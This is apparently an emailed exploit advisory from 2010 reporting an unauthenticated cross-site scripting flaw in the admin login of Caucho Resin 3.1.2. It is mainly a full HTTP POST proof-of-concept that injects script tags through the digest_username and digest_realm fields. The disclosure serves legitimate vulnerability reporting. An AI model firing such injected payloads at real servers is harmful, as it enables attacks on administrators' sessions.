hi,brother,I want to post a vul of Caucho Resin web server 

 

 

# Exploit Title:Caucho Resin web server 3.1.2 Admin Login digest_username&digest_realm XSS Vulnerability 
# Date: 2010-05-17
# Author: flyh4t
# Software Link: http://www.caucho.com/
# Version: Professional 3.1.2
# CVE : no

 

P0C:(no need of login)

 

POST /resin-admin/ HTTP/1.1
Accept: */*
Referer: http://1.1.1.1/resin-admin/
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; msn OptimizedIE8;ZHCN)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 1.1.1.1
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=abc7CGMIyBwpNgFko8MIs

 

digest_username=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_password1=&digest_password2=&digest_realm=aaa%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%22&digest_attempt=true
 		 	   		  
_________________________________________________________________
想知道明天天气如何？必应告诉你！
http://cn.bing.com/search?q=%E5%A4%A9%E6%B0%94%E9%A2%84%E6%8A%A5&form=MICHJ2